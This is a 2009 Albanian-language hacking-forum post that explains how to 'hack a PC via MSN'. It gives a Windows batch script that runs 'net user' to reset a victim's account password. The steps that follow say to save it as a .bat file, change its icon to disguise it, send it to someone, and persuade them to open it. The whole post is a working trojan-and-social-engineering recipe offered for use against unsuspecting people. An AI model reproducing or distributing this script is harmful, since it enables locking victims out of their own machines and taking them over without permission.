AHG-CREW


 
ForumGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 hacko pc nga msn

Shko poshtė 
AutoriMesazh
Abi-haCKer
Administrator
Administrator
avatar

Male
Numri i postimeve : 154
Age : 25
Registration date : 04/04/2008

MesazhTitulli: hacko pc nga msn   Fri Feb 06, 2009 1:09 pm

krijo text document dhe ne te qitni codin

Cito:

@echo off
net user "net useri i viktimes" *123456*
echo Tung T'shkoj net useri
pause
net userin e shkruni pa thonjeza , ne yje ( shift 8 ) e shkruni passin e ri qe doni tja ndrroni

1. Save As
2.Ruajeni tek All Files sepse ne tjeter menyr nuk funksionon
3. Ruajeni si diqka sipas deshires por me (.bat) prapashtesen
4.ndrroni ikonen dhe dergojani dikujt
5.thuaji let e hap e shiheni se qka ndodh viktimes i ndrrohet passi i net userit
6 Perdore net userin e dikujt tjeter
7 kenaquni
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://ahg-crew.4umer.com
 
hacko pc nga msn
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
AHG-CREW :: E-Books & Tutorials-
Kėrce tek: